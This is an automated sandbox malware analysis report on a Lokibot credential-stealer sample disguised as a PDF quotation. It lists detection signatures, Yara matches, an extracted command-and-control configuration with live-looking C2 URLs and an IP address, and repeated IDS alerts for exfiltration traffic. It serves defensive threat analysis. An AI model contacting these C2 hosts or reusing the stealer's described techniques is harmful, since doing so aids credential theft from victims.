Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report QUOTAZIONEpdf.exe

Overview

General Information

Sample Name:QUOTAZIONEpdf.exe
Analysis ID:553085
MD5:23b85c2f43b23b57411e4f4366a10b25
SHA1:1511bfee72f99f691c93a1e6b070724890c6aea8
SHA256:9ad929181f755701c0152618393ccff03e0499944c2e3f22fa2d0539347f5c45
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • QUOTAZIONEpdf.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" MD5: 23B85C2F43B23B57411E4F4366A10B25)
    • QUOTAZIONEpdf.exe (PID: 808 cmdline: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" MD5: 23B85C2F43B23B57411E4F4366A10B25)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://slimpackage.com/slimmain/five/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x13ffc:$a2: last_compatible_version
        Click to see the 37 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.QUOTAZIONEpdf.exe.3040000.4.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0x13278:$s1: http://
        • 0x16233:$s1: http://
        • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
        • 0x13280:$s2: https://
        • 0x13278:$f1: http://
        • 0x16233:$f1: http://
        • 0x13280:$f2: https://
        1.2.QUOTAZIONEpdf.exe.3040000.4.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          1.2.QUOTAZIONEpdf.exe.3040000.4.unpackLoki_1Loki Payloadkevoreilly
          • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
          • 0x133fc:$a2: last_compatible_version
          1.2.QUOTAZIONEpdf.exe.3040000.4.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
          • 0x123ff:$des3: 68 03 66 00 00
          • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
          • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
          1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13e80:$s2: https://
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          Click to see the 82 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://slimpackage.com/slimmain/five/fre.php"]}
          Antivirus detection for URL or domainShow sources
          Source: http://slimpackage.com/slimmain/five/fre.phpAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URLShow sources
          Source: slimpackage.comVirustotal: Detection: 5%Perma Link
          Source: http://slimpackage.com/slimmain/five/fre.phpVirustotal: Detection: 8%Perma Link
          Machine Learning detection for sampleShow sources
          Source: QUOTAZIONEpdf.exeJoe Sandbox ML: detected
          Source: 2.0.QUOTAZIONEpdf.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: QUOTAZIONEpdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTAZIONEpdf.exe, 00000001.00000003.292355502.0000000003210000.00000004.00000001.sdmp, QUOTAZIONEpdf.exe, 00000001.00000003.296307100.0000000003080000.00000004.00000001.sdmp
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00402630 FindFirstFileA,
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49742 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49743 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49756 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49756 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49756 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49759 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49759 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49759 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49760 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49760 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49760 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49761 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49763 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49763 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49763 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49764 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49764 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49764 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49770 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49770 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49770 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49771 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49771 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49771 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49772 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49772 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49772 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49773 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49773 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49773 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49775 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49775 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49775 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49781 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49781 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49781 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49789 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49789 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49789 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49806 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49806 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49806 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49813 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49813 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49813 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49814 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49814 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49814 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49815 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49815 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49815 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49821 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49821 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49821 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49822 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49822 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49822 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49824 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49824 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49824 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49825 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49825 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49825 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49826 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49826 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49826 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49832 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49832 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49832 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49840 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49840 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49840 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49852 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49852 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49852 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49853 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49853 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49853 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49854 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49854 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49854 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49855 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49855 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49855 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49856 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49856 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49856 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49857 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49857 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49857 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49858 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49858 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49858 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49859 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49859 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49859 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49860 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49860 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49860 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49861 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49861 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49861 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49862 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49862 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49862 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49863 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49863 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49863 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49864 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49864 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49864 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49865 -> 104.223.93.105:80
